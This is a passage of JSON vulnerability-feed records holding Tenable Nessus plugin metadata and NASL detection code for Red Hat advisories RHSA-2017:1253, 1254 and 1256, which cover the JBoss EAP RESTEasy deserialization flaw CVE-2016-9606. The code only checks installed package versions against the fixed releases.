"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol", "p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-as-sar", "p-cpe:/a:redhat:enterprise_linux:jboss-as-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-server", "p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-threads", 
"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-as-version", "p-cpe:/a:redhat:enterprise_linux:jboss-as-web", "p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices", "p-cpe:/a:redhat:enterprise_linux:jboss-as-weld", "p-cpe:/a:redhat:enterprise_linux:jboss-as-xts", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base", "p-cpe:/a:redhat:enterprise_linux:jbossas-appclient", "p-cpe:/a:redhat:enterprise_linux:jbossas-bundles", "p-cpe:/a:redhat:enterprise_linux:jbossas-core", "p-cpe:/a:redhat:enterprise_linux:jbossas-domain", "p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs", "p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-standalone", "p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:picketbox", "p-cpe:/a:redhat:enterprise_linux:picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:resteasy", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2017-1256.NASL", "href": "https://www.tenable.com/plugins/nessus/100316", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1256. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100316);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1256\");\n\n script_name(english:\"RHEL 5 : JBoss EAP (RHSA-2017:1256)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 5.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.14, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. 
KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1256\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-core-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-entitymanager-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-envers-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hibernate4-infinispan-eap6-4.2.26-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"hornetq-2.3.25-20.SP18_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"httpserver-1.0.8-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-common-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
reference:\"ironjacamar-common-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-common-spi-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-core-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-core-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-deployers-common-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-jdbc-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-spec-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"ironjacamar-validator-eap6-1.0.38-3.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-appclient-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-cli-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-client-all-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-clustering-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-cmp-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-connector-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jboss-as-controller-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:10", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {}, "published": "2017-05-22T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2017:1254)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "id": "REDHAT-RHSA-2017-1254.NASL", "href": "https://www.tenable.com/plugins/nessus/100315", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:42", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. 
KG) for reporting these issues.", "cvss3": {}, "published": "2018-09-04T00:00:00", "type": "nessus", "title": "RHEL 7 : JBoss EAP (RHSA-2017:1253)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:httpserver", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6", "p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cli", "p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all", "p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp", "p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-connector", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client", "p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner", 
"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3", "p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded", "p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77", "p-cpe:/a:redhat:enterprise_linux:jboss-as-logging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-mail", "p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content", "p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster", "p-cpe:/a:redhat:enterprise_linux:jboss-as-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-as-network", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service", "p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink", "p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean", "p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol", "p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-as-sar", "p-cpe:/a:redhat:enterprise_linux:jboss-as-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-server", "p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-threads", 
"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-as-version", "p-cpe:/a:redhat:enterprise_linux:jboss-as-web", "p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices", "p-cpe:/a:redhat:enterprise_linux:jboss-as-weld", "p-cpe:/a:redhat:enterprise_linux:jboss-as-xts", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base", "p-cpe:/a:redhat:enterprise_linux:jbossas-appclient", "p-cpe:/a:redhat:enterprise_linux:jbossas-bundles", "p-cpe:/a:redhat:enterprise_linux:jbossas-core", "p-cpe:/a:redhat:enterprise_linux:jbossas-domain", "p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs", "p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-standalone", "p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:picketbox", "p-cpe:/a:redhat:enterprise_linux:picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:resteasy", "cpe:/o:redhat:enterprise_linux:7"], "id": "REDHAT-RHSA-2017-1253.NASL", "href": "https://www.tenable.com/plugins/nessus/112257", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1253. 
